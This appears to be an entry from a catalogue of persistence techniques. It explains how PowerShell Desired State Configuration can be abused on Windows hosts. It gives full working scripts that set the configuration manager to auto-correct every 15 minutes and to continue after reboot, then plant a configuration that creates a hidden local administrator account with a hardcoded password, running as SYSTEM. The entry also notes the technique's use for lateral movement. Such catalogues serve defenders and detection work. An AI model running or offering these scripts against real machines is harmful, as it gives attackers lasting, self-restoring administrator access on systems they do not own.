Desired State Configuration
Location:
N/A1
Classification:
| Criteria | Value |
|---|---|
| Permissions | Admin |
| Security context | System |
| Persistence type | Other |
| Code type | Files ; Other ; Fileless |
| Launch type | Automatic |
| Impact | Non-destructive2 |
| OS Version | All OS versions |
| Dependencies | OS only3 |
| Toolset | Scriptable |
Description:
Desired State Configuration (DSC) is a feature in PowerShell 4.0 and above that helps administrators to automate the configuration of Windows and Linux operating systems (OSes).
DSC provides a set of PowerShell language extensions, cmdlets and a process called declarative scripting.
Using DSC administrators can ensure that a machine is set to a specific configuration and that if it deviates from the configuration to run scripts that will restore the desired configuration.
After setting a DSC extension the DSC Local Configuration Manager monitors the configuration and if any deviation is found, it can be fixed with DSC scripts running with system privileges.
DSC can be run on a local or remote host the user has admin rights on, so it can be used for lateral movement as well.
To abuse DSC for persistence, first the Local Configuration Manager configuration might need be changed to a configuration that is auto-corrected if there is a deviation, to continue configuration after reboot and the frequency of monitoring and changing should be set to the desired value (min 15 minutes). this can be done with the following script:
#Change DSC Local Configuration Manager
[DSCLocalConfigurationManager()]
Configuration SetDSCLMConfig
{
node localhost
{
Settings
{
ActionAfterReboot = 'ContinueConfiguration' #Might be already set
AllowModuleOverWrite = $true
ConfigurationMode = 'ApplyAndAutoCorrect'
ConfigurationModeFrequencyMins = 15 #Change this
}
}
}
SetDSCLMConfig -OutputPath C:\foo\bar | Out-Null
#Setting the configuration manager
Set-DscLocalConfigurationManager -Path C:\foo\bar -ComputerName localhost
After setting the Local Configuration Manager the next step is to create a malicious configuration that suit our needs. Here is an example of a configuration that adds a user to local administrators and creates a file.
Configuration NotMalicious
{
Node localhost
{
Script ScriptExample
{
SetScript = {
$username = "ITadmin"
$password = ConvertTo-SecureString "password123!!" -AsPlainText -Force
$exist = Get-LocalUser -Name $username -ErrorAction SilentlyContinue
if($exist -eq $null)
{
New-LocalUser -Name $username -Password $password -FullName "Real IT admin"
Add-LocalGroupMember -Group "Administrators" -Member $username
}
Write-Output "$(whoami) just added ITadmin" > C:\foo\bar\dsc.txt
}
TestScript = {
return ($exist -ne $null)
}
GetScript = { @{ Result = ($exist -ne $null) } }
}
}
NotMalicious -OutputPath C:\foo\bar | Out-Null
#Start the configuration
Start-DscConfiguration -Path "C:\foo\bar" -ComputerName localhost | Out-Null
References:
DSC Tutorial DSC Attack Framework Azure DSC Persistence DSC Community
Credits:
- Entry added by @Tamirye94